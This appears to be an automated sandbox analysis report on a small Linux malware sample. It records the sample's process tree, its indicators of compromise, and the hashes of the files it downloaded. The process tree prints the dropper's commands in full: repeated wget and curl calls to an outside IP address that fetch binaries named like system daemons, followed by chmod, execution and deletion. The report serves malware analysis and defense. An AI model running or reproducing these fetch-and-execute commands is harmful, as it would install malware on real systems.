Analysis
-
max time kernel
3s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
20/05/2024, 16:14
Static task
static1
Behavioral task
behavioral1
Sample
6001677acc0dfe15ef8fbe53108140ee_JaffaCakes118
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
6001677acc0dfe15ef8fbe53108140ee_JaffaCakes118
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
6001677acc0dfe15ef8fbe53108140ee_JaffaCakes118
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
6001677acc0dfe15ef8fbe53108140ee_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
6001677acc0dfe15ef8fbe53108140ee_JaffaCakes118
-
Size
2KB
-
MD5
6001677acc0dfe15ef8fbe53108140ee
-
SHA1
83c629e3db7bda0dc3f6df1b129d50f355586034
-
SHA256
a3687f70e86f2efd6e683d0dfe2cc5e19efa6fd17339dbdba7428346050320a2
-
SHA512
60f118c08ab9ce9b3a0b50fe5a83c7e99fb07d61912c49ff513b6bd8196b08f4d25bbd8fd6d3aa74da11ab6cbb0ce561149529b558b779a505917a3da18c583f
Malware Config
Signatures
-
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/ntpd 1481 ntpd /tmp/sshd 1495 sshd /tmp/openssh 1500 openssh /tmp/bash 1505 bash /tmp/tftp 1510 tftp /tmp/wget 1515 wget /tmp/cron 1520 cron /tmp/ftp 1525 ftp /tmp/pftp 1530 pftp /tmp/sh 1537 sh /tmp/nut 1548 nut /tmp/apache2 1553 apache2 /tmp/telnetd 1558 telnetd -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ftp curl File opened for modification /tmp/sh curl File opened for modification /tmp/wget curl File opened for modification /tmp/pftp curl File opened for modification /tmp/apache2 curl File opened for modification /tmp/ntpd curl File opened for modification /tmp/bash curl File opened for modification /tmp/telnetd curl File opened for modification /tmp/sshd curl File opened for modification /tmp/openssh curl File opened for modification /tmp/tftp curl File opened for modification /tmp/cron curl File opened for modification /tmp/nut curl
Processes
-
/tmp/6001677acc0dfe15ef8fbe53108140ee_JaffaCakes118/tmp/6001677acc0dfe15ef8fbe53108140ee_JaffaCakes1181⤵PID:1474
-
/usr/bin/wgetwget http://192.236.160.43/ntpd2⤵PID:1475
-
-
/usr/bin/curlcurl -O http://192.236.160.43/ntpd2⤵
- Writes file to tmp directory
PID:1476
-
-
/bin/chmodchmod +x ntpd2⤵PID:1480
-
-
/tmp/ntpd./ntpd2⤵
- Executes dropped EXE
PID:1481
-
-
/bin/rmrm -rf ntpd2⤵PID:1482
-
-
/usr/bin/wgetwget http://192.236.160.43/sshd2⤵PID:1483
-
-
/usr/bin/curlcurl -O http://192.236.160.43/sshd2⤵
- Writes file to tmp directory
PID:1484
-
-
/bin/chmodchmod +x sshd2⤵PID:1494
-
-
/tmp/sshd./sshd2⤵
- Executes dropped EXE
PID:1495
-
-
/bin/rmrm -rf sshd2⤵PID:1496
-
-
/usr/bin/wgetwget http://192.236.160.43/openssh2⤵PID:1497
-
-
/usr/bin/curlcurl -O http://192.236.160.43/openssh2⤵
- Writes file to tmp directory
PID:1498
-
-
/bin/chmodchmod +x openssh2⤵PID:1499
-
-
/tmp/openssh./openssh2⤵
- Executes dropped EXE
PID:1500
-
-
/bin/rmrm -rf openssh2⤵PID:1501
-
-
/usr/bin/wgetwget http://192.236.160.43/bash2⤵PID:1502
-
-
/usr/bin/curlcurl -O http://192.236.160.43/bash2⤵
- Writes file to tmp directory
PID:1503
-
-
/bin/chmodchmod +x bash2⤵PID:1504
-
-
/tmp/bash./bash2⤵
- Executes dropped EXE
PID:1505
-
-
/bin/rmrm -rf bash2⤵PID:1506
-
-
/usr/bin/wgetwget http://192.236.160.43/tftp2⤵PID:1507
-
-
/usr/bin/curlcurl -O http://192.236.160.43/tftp2⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/chmodchmod +x tftp2⤵PID:1509
-
-
/tmp/tftp./tftp2⤵
- Executes dropped EXE
PID:1510
-
-
/bin/rmrm -rf tftp2⤵PID:1511
-
-
/usr/bin/wgetwget http://192.236.160.43/wget2⤵PID:1512
-
-
/usr/bin/curlcurl -O http://192.236.160.43/wget2⤵
- Writes file to tmp directory
PID:1513
-
-
/bin/chmodchmod +x wget2⤵PID:1514
-
-
/tmp/wget./wget2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm -rf wget2⤵PID:1516
-
-
/usr/bin/wgetwget http://192.236.160.43/cron2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://192.236.160.43/cron2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/chmodchmod +x cron2⤵PID:1519
-
-
/tmp/cron./cron2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm -rf cron2⤵PID:1521
-
-
/usr/bin/wgetwget http://192.236.160.43/ftp2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://192.236.160.43/ftp2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/chmodchmod +x ftp2⤵PID:1524
-
-
/tmp/ftp./ftp2⤵
- Executes dropped EXE
PID:1525
-
-
/bin/rmrm -rf ftp2⤵PID:1526
-
-
/usr/bin/wgetwget http://192.236.160.43/pftp2⤵PID:1527
-
-
/usr/bin/curlcurl -O http://192.236.160.43/pftp2⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/chmodchmod +x pftp2⤵PID:1529
-
-
/tmp/pftp./pftp2⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm -rf pftp2⤵PID:1531
-
-
/usr/bin/wgetwget http://192.236.160.43/sh2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://192.236.160.43/sh2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/chmodchmod +x sh2⤵PID:1536
-
-
/tmp/sh./sh2⤵
- Executes dropped EXE
PID:1537
-
-
/bin/rmrm -rf sh2⤵PID:1538
-
-
/usr/bin/wgetwget http://192.236.160.43/nut2⤵PID:1539
-
-
/usr/bin/curlcurl -O http://192.236.160.43/nut2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/chmodchmod +x nut2⤵PID:1547
-
-
/tmp/nut./nut2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm -rf nut2⤵PID:1549
-
-
/usr/bin/wgetwget http://192.236.160.43/apache22⤵PID:1550
-
-
/usr/bin/curlcurl -O http://192.236.160.43/apache22⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/chmodchmod +x apache22⤵PID:1552
-
-
/tmp/apache2./apache22⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm -rf apache22⤵PID:1554
-
-
/usr/bin/wgetwget http://192.236.160.43/telnetd2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://192.236.160.43/telnetd2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/chmodchmod +x telnetd2⤵PID:1557
-
-
/tmp/telnetd./telnetd2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm -rf telnetd2⤵PID:1559
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9KB
MD53e531211d06886f2a957241f6e49b8ec
SHA134ccc5b40b93c6f0d11485fdf6923bcf53a67760
SHA2561b111d0f0602539c5ceb6c5c194d89aee88c25d892c12acb15338f7f87e929fe
SHA512858858d0870527c3c93a2a67607fec5fd201d9b7fafa79c82b00b4d983bce46a757c7440794d044fedce8ae44954907608f92ffd2102b273fcd3daa9830ac2d3
-
Filesize
9KB
MD500336954c184b7746c756ea8f9ef0730
SHA17fca67220519041660ae341967ab8b239dff0342
SHA25671a573bf26399cdf641ea75d9c1d3467cf1fb784af4a9a257ab8c32b4b5dd7d4
SHA512df38f54309a760bb4a5a9ce58bdf22e1695ea1f016dcea5b05fb22c615777e0cda81bd08b42897e9a75669a8a579f8ff7ad4ebb8a20ef082a2adb877c3ddf184
-
Filesize
9KB
MD51c52078ae6417da03a90dd4c3d4fd148
SHA1381900a299bad1416f645261cbaa9c9702d5deb3
SHA256b4d940ee67ddce30f01a152550346253c1a963f73b8ce8b31b1a165d5a65bed2
SHA5125f3ca090ee6ffb9195990a410abaf9babeb78f443a0249bd1c59156f7575d8f5c70114a47358a20492f4e24388bf4965b14e85e449ed4c19b070892f9665b1fb
-
Filesize
9KB
MD500202e360fc58c442ebea8a9cf7e34c2
SHA11aba79af106fe823891d1a651805f9958c860493
SHA256d6bd72afd400abbe337f41e62bff039320f49aef3ee0d0d2dbb2e3eb8acb46ff
SHA5126afcb949c62b1c13cca7605e03371cd98edb865630b29596f72cfd5eb787f93cf4d692953ce8aed01d61aa5e68bfc7508f202e3375bbeda18b0fe3502567a629
-
Filesize
9KB
MD534a9ed57d537560f5108e41b8a5f7c8f
SHA1eaf2d8b4d9d40df53c1b4b04cddcb9fd2df10bd0
SHA2567ff2ebcd901a10e7d412c2f41a8a2a6e2ee74c0c7c036482894b0b5ffebda43d
SHA512b63e8919003c8af5e8f38f96d81f4e2d2496b107566085e70d43315debbe7948a6878dc4a09b6f184935924ee289bb2db615c3753f52cc03298737746575574b
-
Filesize
9KB
MD5cd482150118316b8bb95f823c890f8ab
SHA10d0f8d5be373f744bf3b8b3b72cf588cc812a25e
SHA256c4c65ec5974cc2879e8eb6d118e85ef19dc4fbf2c4dfefb2fd614950cc23cf6f
SHA51228e2b9203f33112cb5d2640233ae7ef314ef3caaf6ee070cbdea7b647738137e815f40def937ae94fb19c2421f275ae051eab8f06e91d3fa186c230481c29eff
-
Filesize
9KB
MD5ed7b541410dd2eeaabac419c14ac7656
SHA125a478612b3f9a2daf1eff83856cc36b581776ac
SHA256f40babdb709ec6b3ea572aaa00248ee6e5a2aca52a757afb493ebdc4019acc56
SHA51295dd20b13137879e37b922999eb0916a07a87c256ee456a02c3e4142e95c816ad0c52fdf0931a80d0876c649b780a2b56c314375c495704b61de53a97d951016
-
Filesize
9KB
MD53893ce38f28d5f3e52d644afd20ed191
SHA17f3aa97aeed94938a37c858328b24fb41d797925
SHA256f3af004ce8a572e288ff99392594a69ac484200a3c5c86128f538a0629abeba6
SHA51279f900f05acce5750fedb939b2b776a6d0990740c1e74cf6511a8c6afc32d09acad82caac8a7a3eb5e1e449c1a673129a013e381c28e63c498f3bc1f377f4865
-
Filesize
9KB
MD543f3a0b3868e8d62ee5f73caf4c3ad2d
SHA1f37730f6e57a082a3fc5756f02f165d58e3f14b5
SHA256574e625f49abac58c24fcb57c1bb51498daeacd36e9853ad63260a0443f40ece
SHA512b3092a79dd578fdc52cb936f156a570ffc607f07fe44b12c52844bb0743c9026e5e69db9b869ea557c90cb427222e45eb4615af22f078978fe86133a41014304
-
Filesize
9KB
MD5148341b99e222f50d87b57817d9d8d74
SHA18d8b88a2c927e610fe0ea3729244d646dc536219
SHA256e576ce30488aa16509fddcca48469523cf83585daa86c369633f4d7538da84be
SHA51207abb4f7234d6db5fd291feb8c317f87d49753122e56396a9f3236dc89d0dd59225d8537bd3ab6a85fbe3bfef74d793774ada847619f05fc1b976da372b365b9
-
Filesize
9KB
MD589b0c74a466594fff0826c2790cc4ff3
SHA1dd08e48ffd8dcfcbab89221890dd0b4dc43f6ac3
SHA256efd064f25430bb11ed6d830115eb4b1c50bb9699665ea41c43d630a0c06248aa
SHA512ca4ed50a3c0c95a74d15025bb1537e63f2be6a20a1865d1983d3b8777a5e72290c83cae46f9650ef04638ddf91d5c0b53bad400f1bb02b8c6c486cd1c542d077
-
Filesize
9KB
MD5be8fb5a04ce886800c8c41cfd3faf09b
SHA1c90a5ec876d4c81fc39366f9a054d72adf9741b7
SHA25692bb8a8679470f107ae1131d141d0bebfa2188925992d5213a5b67047f6ceb1c
SHA5120e4d892b9f54166dfd7c12e5e896cc7cf4ed8e83f1f8153f8daab246d53b4b03acd0f859aab6863f1bc053c2b4d4b03e67c07360c11b1631ff14064614a27f55
-
Filesize
9KB
MD5884dfc9ce2d6d45ac1a3128ad807eab0
SHA14339416af2a6c6aa7c3c131c6da46f1e30765853
SHA2565662935f359137a8be02497b40ec4219ecd6ff68ebd286f26ae2460442bb1c10
SHA5121b72102436f88138fd84dc3d8f6c7594ab46eb6e7799fa28de716dea71ddfb7f27d38eeabe554b8b71dfa6c212f3afa3c4aedc65b442e8d8c0a3cecf19236841